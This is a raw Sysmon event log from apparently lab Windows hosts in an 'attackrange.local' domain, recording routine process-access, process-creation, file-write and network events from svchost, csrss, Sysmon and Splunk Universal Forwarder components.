07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081162Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081161Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081160Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081159Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081158Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081157Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B20C-615A-3C01-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081156Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B20C-615A-3C01-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081155Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.162{2FDD8D40-B20C-615A-3C01-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:32.028{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=55B5040A4AE7B57E872DD98D6890C0DA,SHA256=6D365F6223169461383394BB2D444521B726D68AFE764CE2315E412D5DDD2288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:33.059{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABB11C3398359A9AC7041D643B85936,SHA256=ADEB914E547D0BD25CA7472E2F441987173A52224C611DA5E361106726C8B0EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081184Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B20D-615A-3D01-00000000FD01}1676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081183Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081182Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081181Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081180Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081179Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081178Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081177Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081176Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081175Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081174Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B20D-615A-3D01-00000000FD01}1676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081173Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B20D-615A-3D01-00000000FD01}1676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081172Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.146{2FDD8D40-B20D-615A-3D01-00000000FD01}1676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081171Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:33.005{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8166426C55C042866FD9B9B4DDF5279E,SHA256=9DC03215F66B52F501B2D953FFE36274AAEC553032A288DA376C595D584D13F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:33.373{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49510-false10.0.1.12-8000- 23542300x8000000000000000103299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:34.169{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A663898B47F7E6BBFE39042F4576D7CC,SHA256=C900830F42D87953038E9B288A9064CDEA9E6DDE7799D8806BDA7F2791838484,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081201Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.896{2FDD8D40-B20E-615A-3E01-00000000FD01}15362360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081200Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B20E-615A-3E01-00000000FD01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081199Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 